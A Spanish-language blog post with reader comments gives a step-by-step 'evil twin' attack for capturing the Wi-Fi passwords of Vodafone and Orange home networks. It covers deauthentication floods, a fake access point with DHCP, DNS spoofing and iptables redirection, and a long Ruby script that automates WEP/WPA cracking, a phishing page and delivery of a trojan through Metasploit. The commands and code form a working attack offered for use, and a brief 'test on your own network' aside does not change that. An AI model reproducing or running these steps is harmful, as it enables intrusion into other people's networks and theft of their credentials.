AUDITANDO REDES VODAFONEXXXX Y ORANGE-XXXX:
SOLUCIÓN 'PARCHE' A LAS REDES 'SEGURAS' DE ORANGE-XXXX Y VODAFONEXXXX EN EL PROCESO DE OBTENCIÓN DE LA CLAVE A LA FUERZA.
(BASADO EN LA GUERRA SICOLÓGICA)
USO: EN BACKTRACK 5
RESUMEN BREVE:
Te pones a capturar una red Orange o vodafone (La tuya por Dios para probar)
Te pones a desautentificar la red hasta no poder más ,todas las que puedas,haciendo pensar que SU wifi ha muerto...
Creas un AP falso con el nombre de la red en cuestión (AP-FAKE)
De tanto conectarse y desconectarse,reiniciará el router y ahí le pedirá la contraseña de la red....(La suya o la falsa)(Si cae en la falsa...está hecho)
PREMIOOOOOOOOOOOOOOOOOOOOOOO!!!
Un punto de acceso a Internet utilizando algún software o también conocido como SoftAP, permite a otros usuarios usar nuestra conexión a Internet pasando por medio de nuestras interfaces de red, de esta forma, todos los paquetes que se envíen al punto de acceso pasarán por medio de nosotros, dado que no establecemos una clave a nuestra WIFI todos los usuarios podrán conectarse a ella sin ningún tipo de restricción (aunque se podría establecer claves WEP/WPA si así lo deseamos) sin embargo, el atractivo de tener la conexión sin ningún tipo de protección es que el número de clientes que accederán a ella será mayor, lo que nos permitirá ejecutar ataques MITM con una mayor cantidad de objetivos potenciales.
Por otro lado también es posible utilizar la técnica conocida como “Evil Twin” partiendo de los pasos detallados aquí, esta técnica consiste en la obtención de la clave WEP/WPA de un objetivo determinado partiendo de un ataque de denegación de servicio contra el AP objetivo y posteriormente estableciendo el mismo BSSID/ESSID del objetivo a nuestro softAP, de esta forma, parecería que son exactamente el mismo AP (en ocasiones este ataque normalmente viene acmpañado con el “Caffe Late Attack”), dado que se ha lanzado un ataque de denegación de servicio, el AP objetivo se encontrará fuera de servicio y los clientes que tengan activada la opción de conexión automática con el AP de la red Wifi, verán que se solicita nuevamente la clave WEP/WPA para establecer la conexión, realmente estarán enviando la contraseña al AP falso.
Los supuestos son:
La interface de red cableada: eth0
La interface de red inhalambrica: wlan0
La interface en modo monitor es: mon0
La Interface resultante del comando airbase (el softAP) es: at0
Los pasos a seguir son:
- Utilizar Aircrack-NG para poner la interface en modo monitor.>airmon-ng start wlan0
- Instalar el servidor DHCP y el servidor DNS (En el caso que no se encuentren instalados)
>apt-get install dhcp3-server bind9 - Detener los servicios.
>/etc/init.d/dhcp3-server stop
>/etc/init.d/bind9 stop - Configurar adecuadamente el servidor DHCP:
Abrir el fichero /etc/dhcp3/dhcpd.conf y establecer los parámetros de la red que se va a crear y el mecanismo de asignación de direcciones IP a los clientes que se intenten conectar al AP, el fichero deberá contener algo similar a esto:ddns-update-style ad-hoc;
default-lease-time 600;
default-lease-time 7200;
authoritative;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers 192.168.1.1;
range 192.168.2.130 192.168.2.140;
}
Con esto definimos, los tiempos de respuesta máximos para la conexión
(default-lease-time, default-lease-time) también definimos los parámetros de la subred, indicando el rango ip inicial para la red y la mascara de red, posteriormente hay que definir opciones adicionales de la subred, tales como la mascara (que es la misma que la mascara de red definida), la dirección de broadcast, el router de la subred, el rango de ip disponibles para los clientes, (entre las direcciones 192.168.2.130 y 192.168.2.140) el atributo que resulta más interesante es el domain-name-server ya que se trata de la dirección IP del gateway que nos proporciona salida a internet, en una red domestica, el valor mas común es la dirección del router, ya que sin esto los clientes que se conecten a nuestro servidor no tendrán salida a Internet.
Finalmente es necesario establecer las interfaces que usará el servidor DHCP, para esto es necesario especificarlas en el fichero: /etc/default/dhcp3-server en la linea INTERFACES donde es necesario indicar la(s) interfaces, por ejemplo:
INTERFACES=”eth0 wlan0”
- Iniciar el softAP en nuestra máquina con:airbase-ng -I 100 -P -C 2 -c 3 –essid WIFI_COMPARTIDA mon0Opciones:
-I : Indica el intervalo en mili segundos entre cada beacon.
-P : Indica que el softAP responderá a todas las pruebas de broadcast sin importar el ESSID especificado.
-C : El numero de segundos en los que el ESSID especificado también es beaconed
-c : Indica el canal en donde estará el AP.
–essid : Se trata del ESSID.NOTA: En algunas tarjetas inhalambricas, una vez el access point inicia, el canal que se establece es el 255, lo cual se puede comprobar con el uso de airodump-ng donde aparecerá el punto de acceso y su canal asociado, se se trata de un bug reportado, cuya solución se encuentra en el siguiente enlace: http://forum.aircrack-ng.org/index.php?topic=5755.0 - Una vez iniciado el airbase-ng, se crea automáticamente la interface at0, es necesario configurarla de la siguiente forma:>ifconfig at0 up
>ifconfig at0 192.168.2.129 netmask 255.255.255.128
>route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129De esta forma indicamos que la interface del softAP usará de los parámetros de red indicados en el fichero de configuración para el servidor DHCP, se ha levantado la interface en el primer comando, en el segundo se ha definido la dirección IP del gateway y la mascara de red, finalmente adicionamos el enrutamiento para la red 192.168.2.128 (128 se trata del ultimo segmento de la dirección de broadcast), la mascara de red y el gateway de la subred. - Ahora podemos iniciar el servidor DHCP con los siguientes parámetros:>dhcp3 -d -f at0En el caso de que se produzca el siguiente error
Can’t create PID file /var/run/dhcpd.pid: Permission denied.Es necesario crear un enlace simbolico apuntando al pid:
>ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pidPosteriormente iniciar el servidor DNS:
>/etc/init.d/bind9 start - Con esto ya esta preparado, tenemos el servidor configurado en nuestra máquina esperando a que se conecten clientes, sin embargo, aun falta establecer determinados parámetros en las políticas de redirección y tratamiento de paquetes que pasan por nuestra maquina, para esto es necesario establecer las siguientes reglas en nuestro firewall iptables en local.
iptables –flush
iptables –table nat –flush
iptables –delete-chain
iptables –table nat –delete-chain
iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE
iptables –append FORWARD –in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp -j DNAT –to 192.168.1.1
echo 1 > /proc/sys/net/ipv4/ip_forwardnano /etc/sysctl.conf
net.ipv4.conf.default.forwarding=1 net.ipv4.conf.all.forwarding=1Las opciones anteriormente indicadas contienen:
Los 4 primeros comandos limpian las reglas del firewall para establecerlas.
El 5 comando indica que el enrutamiento debe ser tratado por la interface de salida eth0 (Red Cableada) evidentemente debe de estar conectado el cable de red, sin embargo, si se desea se puede utilizar la red inhalambrica.
El 6 comando indica que que se va a realizar el enrutamiento de los paquetes que llegan a la interfaz de entrada at0 (La interfaz correspondiente a nuestro SoftAP, por lo tanto las peticiones de todos los clientes que se conecten a él) se especifica que todos los paquetes van a ser aceptados.
Finalmente las ultimas lineas corresponden al enrutamiento como tal, es necesario especificar la ruta del gateway para peticiones udp, los últimos parámetros son necesarios para permitir el enrutamiento de las peticiones.Eso es todo, ahora tenemos nuestro Fake AP funcionando, ahora es posible utilizar diferentes tipos de ataques a los clientes conectados. Como por ejemplo ataques MITM y el uso de KarmetaSploit que se verá con un buen nivel de detalle en una próxima entrada, donde podremos ver como utilizar MetaSploit Framework y los conceptos teóricos y prácticos aquí expuestos.SCRIPT DEL PROCESO TRADUCIDO AL ESPAÑOL:#!/usr/bin/env rubydef menuputs "################## Coded By Flow (Koala) #######"puts "################## #######"puts " ######################### "puts " ############# "puts " ##### "puts " # "puts "~~~~~~~~~~~~~~~~~~ 0 -Instalación de los elementos ~~~~"puts "~~~~~~~~~~~~~~~~~~ 1 -Crack de llave WEP mediante inyección ~~~~"puts "~~~~~~~~~~~~~~~~~~ 2 -Crack de llave WEP mediante -p0841 ~~~~"puts "~~~~~~~~~~~~~~~~~~ 3 -Crack de llavee WPA con diccionario ~~~~"puts "~~~~~~~~~~~~~~~~~~ 4 -Crack WPA con rogue AP y pagina fake ~~~~"puts "~~~~~~~~~~~~~~~~~~ 5 -Crack WPA con rogue AP y WKV ~~~~"puts "~~~~~~~~~~~~~~~~~~ 6 -Caja de herramienta ~~~~"endmenuopt=""while (opt!="0" && opt!="1" && opt!="2" && opt!="3" && opt!="4" && opt!="5" && opt!="6")puts "Opción elegida (entre 0 y 6)"opt=gets.chompendif(opt=="0")puts "Se esta iniciando la instalación de los elementos necesarios al Rogue. Gracias por esperar y no interrumpir el proceso. Se le pedirá probablemente confirmación para instalar los nuevos paquetes. Si es así entrar «Y» para «Yes» y «S» para «si»."sleep 10system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install dsniff &> /dev/null &")sleep 60system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install wireshark &> /dev/null &")sleep 90system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo apt-get install dhcp3-server &> /dev/null &")sleep 90system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo apt-get install apache2 &> /dev/null &")sleep 150system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install libapache2-mod-php5 &> /dev/null &")`sudo a2enmod php5``sudo service apache2 restart`endmenuif(opt=="1")puts "Responder a las preguntas del programa, tener cuidado en no equivocarse"sleep 5`airmon-ng start wlan0`system ("ifconfig")puts "Entrar dirección MAC de su dispositivo wireless"mac=""mac=gets.chomp$mac=macputs "Efectuando escaneo de redes. Una vez elegido el objectivo prensar Ctrl+c para seguir adelante"sleep 5system ("airodump-ng --encrypt wep mon0")puts "Nombrar el fichero de captura"nombre=""nombre=gets.chomp$nombre=nombreputs "Entrar el nombre de la red (ESSID)"essid=""essid=gets.chomp$essid=essidputs "Entrar el numero del canal de la red (CH)"ch=""ch=gets.chomp$ch=chputs "Entrar la dirección MAC de la red (BSSID)"bssid=""bssid=gets.chomp$bssid=bssidsystem ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nombre} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")sleep 5system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -3 -e #{$essid} -a #{$bssid} -h #{$mac} -x 500 mon0 &> /dev/null &")sleep 1800system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng #{$nombre}-01.cap &> /dev/null &")endif(opt=="2")puts "Responder a las preguntas del programa, tener cuidado en no equivocarse"sleep 5system ("ifconfig")puts "Entrar la dirección MAC de su dispositivo wireless"mac=""mac=gets.chomp$mac=macputs "Responder a las preguntas del programa, tener cuidado en no equivocarse"sleep 5system ("airodump-ng --encrypt wep mon0")puts "Nombrar el fichero de captura"nombre=""nombre=gets.chomp$nombre=nombreputs "Entrar el nombre de la red (ESSID)"essid=""essid=gets.chomp$essid=essidputs "Entrar el numero del canal de la red (CH)"ch=""ch=gets.chomp$ch=chputs "Entrar la dirección MAC de la red (BSSID)"bssid=""bssid=gets.chomp$bssid=bssidsystem ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nombre} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")sleep 5system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} mon0 &> /dev/null &")sleep 1800system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nombre}-01.cap &> /dev/null &")endif(opt=="3")puts "Efectuando escaneo de redes. Una vez elegido el objectivo prensar Ctrl+c para seguir adelante"sleep 5system ("airodump-ng --encrypt wpa mon0")puts "Nombrar el fichero de captura"nombre=""nombre=gets.chomp$nombre=nombreputs "Entrar nombre de la red (ESSID)"essid=""essid=gets.chomp$essid=essidputs "Entrar numero del canal de la red (CH)"ch=""ch=gets.chomp$ch=chputs "Entrar la dirección MAC de la red (BSSID)"bssid=""bssid=gets.chomp$bssid=bssidputs "Entrar la dirección MAC del cliente conectado a la red (STATION)"station=""station=gets.chomp$station=stationsystem ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nombre} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -0 20 -a #{$bssid} -c #{$station} mon0 &> /dev/null &")sleep 18rep=""while rep!="si" && rep!="no"puts "¿El handshake ha sido recuperado? si/no"rep=gets.chompif rep=="si"puts "Entrar el nombre del diccionario a utilizar"dico=""dico=gets.chomp$dico=dicosystem ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -w #{$dico} #{$nom}.cap &> /dev/null &")elsif rep=="no"puts "Iniciando mdk3"sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e mdk3 mon0 a -a #{$bssid} &> /dev/null &")sleep 40puts "Ahora escribir el nombre del diccionario a emplear"dico=""dico=gets.chomp$dico=dicosystem ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -w #{$dico} #{$nombre}.cap &> /dev/null &")elseputs "Elegir una respuesta valida"endendendif(opt=="4")puts "Efectuando escaneo de redes. Una vez elegido el objectivo prensar Ctrl+c para seguir adelante"sleep 5system ("airodump-ng --encrypt wpa mon0")puts "Entrar el nombre de la red (ESSID)"essid=""essid=gets.chomp$essid=essidputs "Entrar bel numero del canal de la red (CH)"ch=""ch=gets.chomp$ch=chputs "Entrar la dirección de la red (BSSID)"bssid=""bssid=gets.chomp$bssid=bssidputs "Creación de la rogue AP"sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")sleep 3`ifconfig at0 up``ifconfig at0 10.0.0.1 netmask 255.255.255.0``ifconfig at0 mtu 1400``echo > dhcpd.leases``iptables --flush``iptables --table nat --flush``iptables --delete-chain``iptables --table nat --delete-chain``route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null``iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1``iptables -P FORWARD ACCEPT``iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80`puts "Reglas iptables establecidas, reiniciando dhcp3"sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")puts "Puesta en funcionamiento de apache y dnsspoof"sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")puts "Iniciando wireshark"sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")sleep 5down=""while down!="si" && down!="no"puts "Para el ataque tipo downgrade de la red objectivo; usar mdk3 o airebase? El resultado es el mismo pero mdk3 va intentar desconectar el cliente de la red mientras que airebase va crear una red idéntica a la red objectivo para impedir que se conecte correctamente al AP legitimo. Una cruz roja debería ser visible dónde ve normalmente el icono de su gestor de redes. Solo puede usar una herramienta a la vez. ¿Cual elige? mdk3/airbase"down=gets.chompif down=="mdk3"system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e mdk3 mon0 a -a #{$bssid}")elsif down=="airbase"system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -c #{$ch} -e #{$essid} -a #{$bssid} -I 600 -0 mon0 &> /dev/nul &")puts "¿Volver al menú?"rp=gets.chompelseputs "Eligir una respuesta valida"endendendif(opt=="5")puts "Efectuando escaneo de redes. Una vez elegido el objectivo prensar Ctrl+c para seguir adelante"sleep 5system ("airodump-ng --encrypt wpa mon0")puts "Entrar el nombre de la red (ESSID)"essid=""essid=gets.chomp$essid=essidputs "Entrar el numero del canal de la red (CH)"ch=""ch=gets.chomp$ch=chputs "Entrar la dirección MAC de la red (BSSID)"bssid=""bssid=gets.chomp$bssid=bssidputs "Creación de la rogue AP"sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch}-e #{$essid} mon0 &> /dev/null &")sleep 3`ifconfig at0 up``ifconfig at0 10.0.0.1 netmask 255.255.255.0``ifconfig at0 mtu 1400``echo > dhcpd.leases``iptables --flush``iptables --table nat --flush``iptables --delete-chain``iptables --table nat --delete-chain``route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null``iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1``iptables -P FORWARD ACCEPT``iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80`puts "Reglas iptables establecidas, reiniciando dhcp3"sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")puts "Puesta en funcionamiento de apache y dnsspoof"sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")puts "Implementado troyano"sleep 3`cp -f /root/flowpa/WirelessKeyView.exe /tmp/WirelessKeyView.exe`Dir.chdir '/root/metasploit'`cd /root/metasploit`sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e ./msfconsole -r /root/flowpa/flowpa.rc &> /dev/null &")sleep 5down=""while down!="si" && down!="no"puts "Para el ataque tipo downgrade de la red objectivo; usar mdk3 o airebase? El resultado es el mismo pero mdk3 va intentar desconectar el cliente de la red mientras que airebase va crear una red idéntica a la red objectivo para impedir que se conecte correctamente al AP legitimo. Una cruz roja debería ser visible dónde ve normalmente el icono de su gestor de redes. Solo puede usar una herramienta a la vez. ¿Cual elige? mdk3/airbase"down=gets.chompif down=="mdk3"system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e mdk3 mon0 a -a #{$bssid}")elsif down=="airbase"system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -c #{$ch} -e #{$essid} -a #{$bssid} -I 600 -0 mon0 &> /dev/nul &")elseputs "Elegir una respuesta valida"endendendif(opt=="6")puts "1 -Editar los ficheros esenciales al crack"puts "2 -Editar les ficheros log de apache"puts "3 -Hacer un Rogue transparente permitiendo que el cliente de la red objetivo pueda navegar en la red"puts "4 -Hacer un listado de los ficheros y derechos respectivos en dans /var/www"eleccion=""while eleccion!="1" && eleccion!="2" && eleccion!="3"eleccion=gets.chompif eleccion=="1"`gedit /etc/dhcp3/dhcpd.conf``gedit /root/dns.txt`elsif eleccion=="2"`gedit /var/log/apache2/access.log``gedit /var/log/apache2/error.log`elsif eleccion=="3"puts "Efectuando escaneo de redes. Una vez elegido el objetivo prensar Ctrl+c para seguir adelante"sleep 5system ("airodump-ng --encrypt wpa mon0")puts "Entrar nombre la red (ESSID)"essid=""essid=gets.chomp$essid=essidputs "Entrar numero de canal de la red (CH)"ch=""ch=gets.chomp$ch=chputs "Entrar dirección MAC de la red (BSSID)"bssid=""bssid=gets.chomp$bssid=bssidputs "Creación del rogue AP"sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")sleep 3`ifconfig at0 up``ifconfig at0 10.0.0.1 netmask 255.255.255.0``ifconfig at0 mtu 1400``echo > dhcpd.leases``iptables --flush``iptables --table nat --flush``iptables --delete-chain``iptables --table nat --delete-chain``iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE``iptables --append FORWARD --in-interface at0 -j ACCEPT``iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1`puts "Reglas iptables establecidas, reiniciando dhcp3"sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")puts "La victima puede ahora navegar en la red; ¡no sean mal@s! :)"sleep 5elsif choix=="4"puts "Los ficheros presentes son:"sleep 3system ("ls -l /var/www")endendendsystem ("ruby Securethis.rb")
NOTA(S), El mode monitor se activa con el opción 1, si no queréis usar el opción 1 lo hacéis a mano en un shell a parte con el clásicoCódigo: [Seleccionar]sudo airmon-ng start <interfaz>
¿PODÍAIS EXPLICARLO "PARA TONTOS"?
ResponderEliminarGRACIAS
http://www.youtube.com/watch?v=vy4leX_twTw Echale un vistazo a esto...sobre el FAKE-AP muy util!!
Eliminarey tio felicidades!.lo proximo el pentagono.......jejeje.
ResponderEliminarno de verdad, increible fantastico trabajo excelente,muchas gracias por el aporte
que alguien haga un video y lo explique mejor. capto la idea pero no se como hacerlo :(
ResponderEliminarhttp://www.youtube.com/watch?v=vy4leX_twTw Echale un vistazo a esto...sobre el FAKE-AP muy util!!
Eliminarhttp://www.youtube.com/watch?v=vy4leX_twTw Echale un vistazo a esto...sobre el FAKE-AP muy util!!
ResponderEliminaralguien puede hacer un video en español. tengo que crear una ap falsa igual pero como me llega a mi la clave??... me parece que estoy muy perdido!! :,(
ResponderEliminarsi porfavor que alguien haga un tutorial mas claro! para tontos jejeje
ResponderEliminarpues yo cuando reinicio mi router no me pide que vuelva a meter la pass... en todo caso cuando se RESETEA pero NO CUANDO SE REINICIA.
ResponderEliminar